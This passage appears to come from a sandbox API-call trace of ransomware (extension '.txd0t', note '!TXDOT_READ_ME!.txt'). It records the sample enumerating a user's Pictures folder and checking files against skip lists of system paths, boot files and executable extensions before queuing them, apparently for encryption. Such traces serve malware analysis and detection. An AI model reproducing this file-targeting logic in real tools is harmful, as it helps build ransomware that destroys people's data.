lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x779d7ee0, ftCreationTime.dwHighDateTime=0x1d5ed4e, ftLastAccessTime.dwLowDateTime=0xc4854390, ftLastAccessTime.dwHighDateTime=0x1d5e949, ftLastWriteTime.dwLowDateTime=0xc4854390, ftLastWriteTime.dwHighDateTime=0x1d5e949, nFileSizeHigh=0x0, nFileSizeLow=0xbd03, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="msDAnVl Vs INrTL.jpg", cAlternateFileName="MSDANV~1.JPG")) returned 1 [0076.276] StrCmpW (psz1="msDAnVl Vs INrTL.jpg", psz2=".") returned 1 [0076.276] StrCmpW (psz1="msDAnVl Vs INrTL.jpg", psz2="..") returned 1 [0076.276] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0076.276] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0076.276] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="msDAnVl Vs INrTL.jpg", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg") returned="C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg" [0076.276] PathFindExtensionW (pszPath="msDAnVl Vs INrTL.jpg") returned=".jpg" [0076.276] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0076.276] StrCmpIW (psz1="msDAnVl Vs INrTL.jpg", psz2="bootsect.bak") returned 1 [0076.276] StrCmpIW (psz1="msDAnVl Vs INrTL.jpg", psz2="iconcache.db") returned 1 [0076.276] StrCmpIW (psz1="msDAnVl Vs INrTL.jpg", psz2="thumbs.db") returned -1 [0076.277] StrCmpIW (psz1="msDAnVl Vs INrTL.jpg", psz2=" ransomware ") returned 1 [0076.277] StrCmpIW (psz1="msDAnVl Vs INrTL.jpg", psz2=" ransom ") returned 1 [0076.277] StrCmpIW (psz1="msDAnVl Vs INrTL.jpg", psz2="debug.txt") returned 1 [0076.277] StrCmpIW (psz1="msDAnVl Vs INrTL.jpg", psz2="boot.ini") returned 1 [0076.277] StrCmpIW (psz1="msDAnVl Vs INrTL.jpg", psz2="desktop.ini") returned 1 [0076.277] StrCmpIW (psz1="msDAnVl Vs INrTL.jpg", psz2="autorun.inf") returned 1 [0076.277] StrCmpIW (psz1="msDAnVl Vs INrTL.jpg", psz2="ntuser.dat") returned -1 [0076.277] StrCmpIW (psz1="msDAnVl Vs INrTL.jpg", psz2="ntldr") returned -1 [0076.277] StrCmpIW (psz1="msDAnVl Vs INrTL.jpg", psz2="ntdetect.com") returned -1 [0076.277] StrCmpIW (psz1="msDAnVl Vs INrTL.jpg", psz2="bootfont.bin") returned 1 [0076.277] StrCmpIW (psz1="msDAnVl Vs INrTL.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.277] PathFindExtensionW (pszPath="msDAnVl Vs INrTL.jpg") returned=".jpg" [0076.277] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0076.277] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.277] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.277] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0076.292] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.292] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg" [0076.292] SetEvent (hEvent=0x410) returned 1 [0076.292] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38c320d0, ftCreationTime.dwHighDateTime=0x1d5e899, ftLastAccessTime.dwLowDateTime=0xa9ae02d0, ftLastAccessTime.dwHighDateTime=0x1d5eb67, ftLastWriteTime.dwLowDateTime=0xa9ae02d0, ftLastWriteTime.dwHighDateTime=0x1d5eb67, nFileSizeHigh=0x0, nFileSizeLow=0x1bc4, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="nDbY.bmp", cAlternateFileName="")) returned 1 [0076.292] StrCmpW (psz1="nDbY.bmp", psz2=".") returned 1 [0076.292] StrCmpW (psz1="nDbY.bmp", psz2="..") returned 1 [0076.292] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0076.292] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0076.292] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="nDbY.bmp", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp") returned="C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp" [0076.292] PathFindExtensionW (pszPath="nDbY.bmp") returned=".bmp" [0076.292] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0076.292] StrCmpIW (psz1="nDbY.bmp", psz2="bootsect.bak") returned 1 [0076.292] StrCmpIW (psz1="nDbY.bmp", psz2="iconcache.db") returned 1 [0076.292] StrCmpIW (psz1="nDbY.bmp", psz2="thumbs.db") returned -1 [0076.293] StrCmpIW (psz1="nDbY.bmp", psz2=" ransomware ") returned 1 [0076.293] StrCmpIW (psz1="nDbY.bmp", psz2=" ransom ") returned 1 [0076.293] StrCmpIW (psz1="nDbY.bmp", psz2="debug.txt") returned 1 [0076.293] StrCmpIW (psz1="nDbY.bmp", psz2="boot.ini") returned 1 [0076.293] StrCmpIW (psz1="nDbY.bmp", psz2="desktop.ini") returned 1 [0076.293] StrCmpIW (psz1="nDbY.bmp", psz2="autorun.inf") returned 1 [0076.293] StrCmpIW (psz1="nDbY.bmp", psz2="ntuser.dat") returned -1 [0076.293] StrCmpIW (psz1="nDbY.bmp", psz2="ntldr") returned -1 [0076.293] StrCmpIW (psz1="nDbY.bmp", psz2="ntdetect.com") returned -1 [0076.293] StrCmpIW (psz1="nDbY.bmp", psz2="bootfont.bin") returned 1 [0076.293] StrCmpIW (psz1="nDbY.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.293] PathFindExtensionW (pszPath="nDbY.bmp") returned=".bmp" [0076.293] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0076.293] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.293] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.293] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0076.300] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.300] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp" [0076.300] SetEvent (hEvent=0x418) returned 1 [0076.300] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87624400, ftCreationTime.dwHighDateTime=0x1d5e92a, ftLastAccessTime.dwLowDateTime=0x4b8617f0, ftLastAccessTime.dwHighDateTime=0x1d5e40b, ftLastWriteTime.dwLowDateTime=0x4b8617f0, ftLastWriteTime.dwHighDateTime=0x1d5e40b, nFileSizeHigh=0x0, nFileSizeLow=0x1898f, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="oOTvWfHAVr.png", cAlternateFileName="OOTVWF~1.PNG")) returned 1 [0076.300] StrCmpW (psz1="oOTvWfHAVr.png", psz2=".") returned 1 [0076.300] StrCmpW (psz1="oOTvWfHAVr.png", psz2="..") returned 1 [0076.300] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0076.300] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0076.300] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="oOTvWfHAVr.png", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png") returned="C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png" [0076.300] PathFindExtensionW (pszPath="oOTvWfHAVr.png") returned=".png" [0076.300] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0076.300] StrCmpIW (psz1="oOTvWfHAVr.png", psz2="bootsect.bak") returned 1 [0076.300] StrCmpIW (psz1="oOTvWfHAVr.png", psz2="iconcache.db") returned 1 [0076.300] StrCmpIW (psz1="oOTvWfHAVr.png", psz2="thumbs.db") returned -1 [0076.300] StrCmpIW (psz1="oOTvWfHAVr.png", psz2=" ransomware ") returned 1 [0076.300] StrCmpIW (psz1="oOTvWfHAVr.png", psz2=" ransom ") returned 1 [0076.300] StrCmpIW (psz1="oOTvWfHAVr.png", psz2="debug.txt") returned 1 [0076.300] StrCmpIW (psz1="oOTvWfHAVr.png", psz2="boot.ini") returned 1 [0076.300] StrCmpIW (psz1="oOTvWfHAVr.png", psz2="desktop.ini") returned 1 [0076.301] StrCmpIW (psz1="oOTvWfHAVr.png", psz2="autorun.inf") returned 1 [0076.301] StrCmpIW (psz1="oOTvWfHAVr.png", psz2="ntuser.dat") returned 1 [0076.301] StrCmpIW (psz1="oOTvWfHAVr.png", psz2="ntldr") returned 1 [0076.301] StrCmpIW (psz1="oOTvWfHAVr.png", psz2="ntdetect.com") returned 1 [0076.301] StrCmpIW (psz1="oOTvWfHAVr.png", psz2="bootfont.bin") returned 1 [0076.301] StrCmpIW (psz1="oOTvWfHAVr.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.301] PathFindExtensionW (pszPath="oOTvWfHAVr.png") returned=".png" [0076.301] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0076.301] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.301] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.301] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0076.307] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.307] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png" [0076.307] SetEvent (hEvent=0x410) returned 1 [0076.307] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0076.307] StrCmpW (psz1="Saved Pictures", psz2=".") returned 1 [0076.308] StrCmpW (psz1="Saved Pictures", psz2="..") returned 1 [0076.308] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0076.308] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0076.308] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="Saved Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\boot\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\programdata\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\drivers\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\wsus\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="crypt_detect") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="cryptolocker") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="ransomware") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0076.308] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="C:\\Program Files") returned 0x0 [0076.308] GetProcessHeap () returned 0xe30000 [0076.308] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d0) returned 0xed31f0 [0076.308] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" [0076.308] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", psz2="\\*", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*" [0076.308] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0076.315] StrCmpW (psz1=".", psz2=".") returned 0 [0076.315] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.315] StrCmpW (psz1="..", psz2=".") returned 1 [0076.315] StrCmpW (psz1="..", psz2="..") returned 0 [0076.315] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.315] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0076.315] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0076.315] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0076.316] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0076.316] GetProcessHeap () returned 0xe30000 [0076.316] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: hHeap=0xe30000) returned 1 [0076.316] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20da860, ftCreationTime.dwHighDateTime=0x1d5ee0e, ftLastAccessTime.dwLowDateTime=0xf31774b0, ftLastAccessTime.dwHighDateTime=0x1d5ed8d, ftLastWriteTime.dwLowDateTime=0xf31774b0, ftLastWriteTime.dwHighDateTime=0x1d5ed8d, nFileSizeHigh=0x0, nFileSizeLow=0x3839, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="SjHlBfZqKWu.bmp", cAlternateFileName="SJHLBF~1.BMP")) returned 1 [0076.316] StrCmpW (psz1="SjHlBfZqKWu.bmp", psz2=".") returned 1 [0076.316] StrCmpW (psz1="SjHlBfZqKWu.bmp", psz2="..") returned 1 [0076.316] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0076.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0076.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="SjHlBfZqKWu.bmp", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp") returned="C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp" [0076.316] PathFindExtensionW (pszPath="SjHlBfZqKWu.bmp") returned=".bmp" [0076.316] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0076.316] StrCmpIW (psz1="SjHlBfZqKWu.bmp", psz2="bootsect.bak") returned 1 [0076.316] StrCmpIW (psz1="SjHlBfZqKWu.bmp", psz2="iconcache.db") returned 1 [0076.316] StrCmpIW (psz1="SjHlBfZqKWu.bmp", psz2="thumbs.db") returned -1 [0076.316] StrCmpIW (psz1="SjHlBfZqKWu.bmp", psz2=" ransomware ") returned 1 [0076.316] StrCmpIW (psz1="SjHlBfZqKWu.bmp", psz2=" ransom ") returned 1 [0076.316] StrCmpIW (psz1="SjHlBfZqKWu.bmp", psz2="debug.txt") returned 1 [0076.316] StrCmpIW (psz1="SjHlBfZqKWu.bmp", psz2="boot.ini") returned 1 [0076.316] StrCmpIW (psz1="SjHlBfZqKWu.bmp", psz2="desktop.ini") returned 1 [0076.316] StrCmpIW (psz1="SjHlBfZqKWu.bmp", psz2="autorun.inf") returned 1 [0076.316] StrCmpIW (psz1="SjHlBfZqKWu.bmp", psz2="ntuser.dat") returned 1 [0076.316] StrCmpIW (psz1="SjHlBfZqKWu.bmp", psz2="ntldr") returned 1 [0076.316] StrCmpIW (psz1="SjHlBfZqKWu.bmp", psz2="ntdetect.com") returned 1 [0076.317] StrCmpIW (psz1="SjHlBfZqKWu.bmp", psz2="bootfont.bin") returned 1 [0076.317] StrCmpIW (psz1="SjHlBfZqKWu.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.317] PathFindExtensionW (pszPath="SjHlBfZqKWu.bmp") returned=".bmp" [0076.317] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0076.317] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.317] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.317] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0076.318] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.318] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp" [0076.318] SetEvent (hEvent=0x418) returned 1 [0076.318] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x708056c0, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0xe96971d0, ftLastAccessTime.dwHighDateTime=0x1d5e486, ftLastWriteTime.dwLowDateTime=0xe96971d0, ftLastWriteTime.dwHighDateTime=0x1d5e486, nFileSizeHigh=0x0, nFileSizeLow=0x9ed9, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="SUlXmTX1.jpg", cAlternateFileName="")) returned 1 [0076.318] StrCmpW (psz1="SUlXmTX1.jpg", psz2=".") returned 1 [0076.318] StrCmpW (psz1="SUlXmTX1.jpg", psz2="..") returned 1 [0076.318] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0076.318] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0076.318] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="SUlXmTX1.jpg", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg") returned="C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg" [0076.318] PathFindExtensionW (pszPath="SUlXmTX1.jpg") returned=".jpg" [0076.318] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0076.318] StrCmpIW (psz1="SUlXmTX1.jpg", psz2="bootsect.bak") returned 1 [0076.318] StrCmpIW (psz1="SUlXmTX1.jpg", psz2="iconcache.db") returned 1 [0076.318] StrCmpIW (psz1="SUlXmTX1.jpg", psz2="thumbs.db") returned -1 [0076.318] StrCmpIW (psz1="SUlXmTX1.jpg", psz2=" ransomware ") returned 1 [0076.318] StrCmpIW (psz1="SUlXmTX1.jpg", psz2=" ransom ") returned 1 [0076.318] StrCmpIW (psz1="SUlXmTX1.jpg", psz2="debug.txt") returned 1 [0076.319] StrCmpIW (psz1="SUlXmTX1.jpg", psz2="boot.ini") returned 1 [0076.319] StrCmpIW (psz1="SUlXmTX1.jpg", psz2="desktop.ini") returned 1 [0076.319] StrCmpIW (psz1="SUlXmTX1.jpg", psz2="autorun.inf") returned 1 [0076.319] StrCmpIW (psz1="SUlXmTX1.jpg", psz2="ntuser.dat") returned 1 [0076.319] StrCmpIW (psz1="SUlXmTX1.jpg", psz2="ntldr") returned 1 [0076.319] StrCmpIW (psz1="SUlXmTX1.jpg", psz2="ntdetect.com") returned 1 [0076.319] StrCmpIW (psz1="SUlXmTX1.jpg", psz2="bootfont.bin") returned 1 [0076.319] StrCmpIW (psz1="SUlXmTX1.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.319] PathFindExtensionW (pszPath="SUlXmTX1.jpg") returned=".jpg" [0076.319] StrStrIW 